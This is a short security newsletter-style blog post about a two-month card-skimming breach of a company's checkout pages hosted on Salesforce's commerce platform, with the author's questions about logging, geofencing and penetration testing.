Normally when I read about another breach, I go yawn. Maybe it rates a mention in the new “Breaches This Week” section of my newsletter.
But this case is a bit different.
Their online purchasing platform was hacked, undetected, for about two months. Again, not that unusual. The attack works by injecting malicious code, typically Javascript, into the checkout pages. That malicious code skims the customer’s credit card information and sends it to a site controlled by the attacker, possibly in a country not so friendly to us.
What made me pause is that this website is hosted inside Salesforce.com’s environment on their Salesforce commerce platform.
The company was not able to detect which credit cards were compromised, so they had to notify everyone who used their credit card on their site in that two month window. What was compromised was the buyer’s name, address and full credit card information.
This is, apparently, not the first time that the Salesforce commerce platform was compromised.
Similar to attacks on Managed Service Providers (MSPs), attackers know that if that can attack an aggregation point like an MSP or Salesforce, they can potentially get a lot of customers.
Is is possible that Salesforce understands how the hackers got in and fixed the problem. If not, companies that use Salesforce’s ecommerce platform should be on high alert.
In the mean time, how come they could not tell which cards were stolen? Was there insufficient logging to tell?
I don’t know if this company sells world wide, but were they using geofencing to reduce the attacker’s opportunity?
Did they pen test their application? Is the vulnerability in their code rather than Salesforce’s?
We may find out more later, but in the meantime, this is yet another warning for web site owners to step up their security.
Source: Bleeping Computer